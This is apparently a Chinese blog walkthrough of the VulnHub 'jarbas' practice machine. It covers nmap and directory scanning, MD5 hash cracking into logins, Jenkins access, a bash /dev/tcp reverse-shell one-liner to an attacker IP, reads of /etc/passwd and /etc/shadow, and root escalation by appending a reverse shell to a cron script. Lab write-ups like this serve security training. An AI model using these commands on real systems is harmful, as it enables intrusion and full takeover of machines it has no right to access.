VulnHub jarbas

复制代码
🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.nmap扫描

cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# arp-scan -l
发现靶机IP:192.168.103.196
cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A 192.168.103.196/24

扫描发现22、80、3306、8080端口

cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# nmap --script=vuln -p22,80,8080 192.168.103.196

--script=vuln  是nmap中的一个模块,能够扫描端口中有哪些漏洞可以利用

先登录下80端口:

没有发现什么有价值的信息

再登录下8080端口:

是个登录界面

2.目录扫描

1.扫描80端口
cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://192.168.103.196

/access.html目录:

发现了一个页面,好像是有几串加密了的字符串

cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# hash-identifier 5978a63b4654c73c60fa24f836386d87 

发现是md5加密

解码工具:

MD5免费在线解密破解_MD5在线加密-SOMD5MD5在线免费破解,支持md5,sha1,mysql,sha256,sha512,md4,织梦,vBulletin,Discuz,md5(Joomla),mssql(2012),ntlm,md5(base64),sha1(base64),md5(wordpress),md5(Phpbb3),md5(Unix),des(Unix)等数十种加密方式https://www.somd5.com/

解码之后的结果是:

cs 复制代码
tiago:5978a63b4654c73c60fa24f836386d87:italia99

trindade:9b38e2b1e8b12f426b0d208a7ab6cb98:marianna

eder:f463f63616cb3f1e81ce46b39f882fd5: vipsu
2.扫描8080端口

发现了8080端口下面有一个robots.txt目录

并没有发现什么有价值的信息

二、漏洞利用

1.jenkins漏洞

大家可以上网找下这个工具的一些漏洞

三个账号密码都试下,下面的是可以正常登陆进去后台的

cs 复制代码
账号:eder
密码:vipsu

2.反弹shell

反弹shell木马

cs 复制代码
bash -i >& /dev/tcp/192.168.103.129/9999 0>&1
cs 复制代码
┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 9999
cs 复制代码
bash -i >& /dev/tcp/192.168.103.129/9999 0>&1

三、提权

1.信息收集

就root和eder(目前登录的账号)有提权机会

cs 复制代码
bash-4.2$ cat /etc/passwd

没有查看密码的权限,这条路说明走不通

cs 复制代码
cat /etc/shadow

2.查看历史进程

cs 复制代码
cat /etc/crontab

说明我们可以追加一个木马进去,然后五分钟可以反弹到root权限

cs 复制代码
echo "bash -i >& /dev/tcp/192.168.103.129/44 0>&1" >> /etc/script/CleaningScript.sh

可以看到反弹成功了

3.flag

大概就是说,恭喜你拿到了最高权限

相关推荐
galaxylove3 分钟前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
漫谈网络4 分钟前
WebSocket扫盲
网络·websocket·网络协议
从后端到QT18 分钟前
SRS流媒体服务器(8)源码分析之rtc/rtmp互相转码详解
运维·服务器·实时音视频
CodeWithMe21 分钟前
Nginx入门进阶:从零到高手的实战指南
运维·nginx
鹏大师运维24 分钟前
在银河麒麟V10 SP1上手动安装与配置高版本Docker的完整指南
linux·运维·docker·容器·麒麟·统信uos·中科方德
QMCY_jason27 分钟前
linux 内存占用排查 vm.nr_hugepages
linux·运维·服务器
PeterJXL31 分钟前
Chrome 下载文件时总是提示“已阻止不安全的下载”的解决方案
前端·chrome·安全
半方白1 小时前
通过 ks.cfg 文件实现 openEuler 系统自动部署
运维·自动化运维
2501_915921431 小时前
请求未达服务端?iOS端HTTPS链路异常的多工具抓包排查记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
moppol1 小时前
容器化 vs 虚拟机:什么时候该用 Docker?什么时候必须用 VM?
运维·docker·容器